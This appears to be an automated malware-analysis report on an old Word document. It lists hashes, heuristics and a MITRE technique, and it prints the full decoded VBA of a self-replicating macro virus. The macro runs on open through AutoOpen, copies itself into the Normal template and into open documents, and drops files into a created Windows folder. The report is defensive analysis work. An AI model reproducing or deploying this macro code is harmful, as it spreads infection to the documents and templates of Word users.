Office (OLE) malware analysis — malicious · e330475c1a08c086

MALICIOUS

Office (OLE)

31.0 KB Created: 2001-10-11 10:00:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 3524f1f03074072ba9be50fb64be0d73 SHA-1: 5ab791a21edb8bc4aaeedcf2106443af4fca2093 SHA-256: e330475c1a08c0861d53352d6da3cda0703aa27a3d9192576b7d45135f39f561

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample contains VBA macros, including an AutoOpen macro, which is a common technique for malicious documents. The script attempts to copy itself to the Normal template and the active document, suggesting an intent to establish persistence or facilitate further infection. The specific family is not identifiable from the provided evidence.

Heuristics 3

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8359 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8359 bytes
SHA-256: `bb5c7a0af75e14bc1e043444c872ffebf04251a59343fe5df44c1891cc473d93`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.Melissa" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "AddString" 'The Microsoft Word Language Visual Basic 'Copyright (c) 1999 Microsoft 'Todos os direitos reservados Public pq As String Sub AutoOpen() Attribute AutoOpen.VB_Description = "Microsoft Word (c) 1999 Corporation\r\nInternet Mail" Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Web.AddString.AutoOpen" Call AddFile Call AddNew 'Call MailNew 'Call Verday End Sub Sub AddNew() Attribute AddNew.VB_Description = "Microsoft Word (c) 1999 Corporation\r\nInternet Mail" Attribute AddNew.VB_ProcData.VB_Invoke_Func = "Web.AddString.AddNew" Dim exec exec = Counter() On Error GoTo 0 Open pq + "\Death Kiss.Ini" For Output As #1 Print #1, exec + 1 Close #1 Doc = ActiveDocument.Path + "\" + ActiveDocument.Name dot = NormalTemplate.FullName On Error Resume Next Application.OrganizerCopy Source:=Doc, _ Destination:=NormalTemplate.FullName, Name:="AddString", _ object:=wdOrganizerObjectProjectItems Application.OrganizerCopy Source:=Doc, _ Destination:=NormalTemplate.FullName, Name:="AddMail", _ object:=wdOrganizerObjectProjectItems On Error GoTo 0 On Error Resume Next Application.OrganizerCopy Source:=dot, _ Destination:=Doc, Name:="AddString", _ object:=wdOrganizerObjectProjectItems Application.OrganizerCopy Source:=dot, _ Destination:=ActiveDocument.Name, Name:="AddMail", _ object:=wdOrganizerObjectProjectItems On Error GoTo 0 End Sub Function Counter() Dim exec exec = "" On Error Resume Next Open pq + "\Death Kiss.Ini" For Input As #1 Input #1, exec Close #1 On Error GoTo 0 Counter = Val(exec) End Function Function AddFile() Dim meucar As String cdir = CurDir() On Error Resume Next ChDir "\" MkDir "\Windows" On Error GoTo 0 On Error Resume Next ChDir "\Windows" MkDir "Application Users" On Error GoTo 0 On Error Resume Next ChDir "\Windows\Application Users" MkDir "AddFile" On Error GoTo 0 ChDir cdir pq = "\Windows\Application Users\AddFile" On Error GoTo 0 p = ActiveDocument.Path + "\Pesquisa de Opinião.doc" If Counter() = 0 Then On Error Resume Next Open p For Binary As #1 Do While Meulocal < LOF(1) meucar = meucar & Input(2048, #1) Meulocal = Loc(1) Loop Close #1 Open pq + "\Pesquisa de Opinião.doc" For Binary Access Write As #1 Put #1, , meucar Close #1 On Error GoTo 0 End If End Function ' Processing file: /opt/analyzer/scan_staging/8554efea6f1a421a83ac1d277b1ba816.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 900 bytes ' Macros/VBA/AddString - 4803 bytes ' Line #0: ' QuoteRem 0x0000 0x0028 "The Microsoft Word Language Visual Basic" ' Line #1: ' QuoteRem 0x0000 0x001C "Copyright (c) 1999 Microsoft" ' Line #2: ' QuoteRem 0x0000 0x001C "Todos os direitos reservados" ' Line #3: ' Dim (Public) ' VarDefn pq (As String) ' Line #4: ' Line #5: ' Line #6: ' Line #7: ' FuncDefn (Sub AutoOpen()) ' Line #8: ' ArgsCall (Call) AddFile 0x0000 ' Line #9: ' ArgsCall (Call) AddNew 0x0000 ' Line #10: ' QuoteRem 0x0001 0x000C "Call MailNew" ' Line #11: ' QuoteRem 0x0001 0x000B "Call Verday" ' Line #12: ' EndSub ' Line #13: ' Line #14: ' FuncDefn (Sub AddNew()) ' Line #15: ' Dim ' VarDefn exec ' Line #16: ' ArgsLd Counter 0x0000 ' St exec ' Line #17: ' Line #18: ' OnError (GoTo 0) ' Line #19: ' Ld pq ' LitStr 0x000F "\Death Kiss.Ini" ' Add ' LitDI2 0x0001 ' Sharp ' LitDefault ' Open (For Output) ' Line #20: ' LitDI2 0x0001 ' Sharp ' PrintChan ' Ld exec ' LitDI2 0x0001 ' Add ' PrintItemNL ' Line #21: ' LitDI2 0x0001 ' Sharp ' Close 0x0001 ' Line #22: ' Line #23: ' Ld ActiveDocument ' MemLd Path ' LitStr 0x00 ... (truncated)

SHA-256: bb5c7a0af75e14bc1e043444c872ffebf04251a59343fe5df44c1891cc473d93

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.Melissa"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AddString"
'The Microsoft Word Language Visual Basic
'Copyright (c) 1999 Microsoft
'Todos os direitos reservados
Public pq As String



Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Microsoft Word (c) 1999 Corporation\r\nInternet Mail"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Web.AddString.AutoOpen"
 Call AddFile
 Call AddNew
 'Call MailNew
 'Call Verday
End Sub
 
Sub AddNew()
Attribute AddNew.VB_Description = "Microsoft Word (c) 1999 Corporation\r\nInternet Mail"
Attribute AddNew.VB_ProcData.VB_Invoke_Func = "Web.AddString.AddNew"
Dim exec
exec = Counter()

On Error GoTo 0
Open pq + "\Death Kiss.Ini" For Output As #1
Print #1, exec + 1
Close #1

Doc = ActiveDocument.Path + "\" + ActiveDocument.Name
dot = NormalTemplate.FullName

On Error Resume Next

Application.OrganizerCopy Source:=Doc, _
       Destination:=NormalTemplate.FullName, Name:="AddString", _
       object:=wdOrganizerObjectProjectItems

Application.OrganizerCopy Source:=Doc, _
       Destination:=NormalTemplate.FullName, Name:="AddMail", _
       object:=wdOrganizerObjectProjectItems

On Error GoTo 0
On Error Resume Next

Application.OrganizerCopy Source:=dot, _
       Destination:=Doc, Name:="AddString", _
       object:=wdOrganizerObjectProjectItems

Application.OrganizerCopy Source:=dot, _
       Destination:=ActiveDocument.Name, Name:="AddMail", _
       object:=wdOrganizerObjectProjectItems

On Error GoTo 0

End Sub

Function Counter()
Dim exec
exec = ""
On Error Resume Next
Open pq + "\Death Kiss.Ini" For Input As #1
Input #1, exec
Close #1
On Error GoTo 0
Counter = Val(exec)
End Function

Function AddFile()
Dim meucar As String
cdir = CurDir()

On Error Resume Next
  ChDir "\"
  MkDir "\Windows"
On Error GoTo 0

On Error Resume Next
ChDir "\Windows"
MkDir "Application Users"
On Error GoTo 0

On Error Resume Next
ChDir "\Windows\Application Users"
MkDir "AddFile"
On Error GoTo 0

ChDir cdir
pq = "\Windows\Application Users\AddFile"
On Error GoTo 0

p = ActiveDocument.Path + "\Pesquisa de Opinião.doc"

If Counter() = 0 Then
   On Error Resume Next
   Open p For Binary As #1
   Do While Meulocal < LOF(1)
       meucar = meucar & Input(2048, #1)
       Meulocal = Loc(1)
   Loop
   Close #1

   Open pq + "\Pesquisa de Opinião.doc" For Binary Access Write As #1
   Put #1, , meucar
   Close #1
   On Error GoTo 0
End If
End Function


' Processing file: /opt/analyzer/scan_staging/8554efea6f1a421a83ac1d277b1ba816.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 900 bytes
' Macros/VBA/AddString - 4803 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0028 "The Microsoft Word Language Visual Basic"
' Line #1:
' 	QuoteRem 0x0000 0x001C "Copyright (c) 1999 Microsoft"
' Line #2:
' 	QuoteRem 0x0000 0x001C "Todos os direitos reservados"
' Line #3:
' 	Dim (Public) 
' 	VarDefn pq (As String)
' Line #4:
' Line #5:
' Line #6:
' Line #7:
' 	FuncDefn (Sub AutoOpen())
' Line #8:
' 	ArgsCall (Call) AddFile 0x0000 
' Line #9:
' 	ArgsCall (Call) AddNew 0x0000 
' Line #10:
' 	QuoteRem 0x0001 0x000C "Call MailNew"
' Line #11:
' 	QuoteRem 0x0001 0x000B "Call Verday"
' Line #12:
' 	EndSub 
' Line #13:
' Line #14:
' 	FuncDefn (Sub AddNew())
' Line #15:
' 	Dim 
' 	VarDefn exec
' Line #16:
' 	ArgsLd Counter 0x0000 
' 	St exec 
' Line #17:
' Line #18:
' 	OnError (GoTo 0) 
' Line #19:
' 	Ld pq 
' 	LitStr 0x000F "\Death Kiss.Ini"
' 	Add 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #20:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	Ld exec 
' 	LitDI2 0x0001 
' 	Add 
' 	PrintItemNL 
' Line #21:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #22:
' Line #23:
' 	Ld ActiveDocument 
' 	MemLd Path 
' 	LitStr 0x00
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.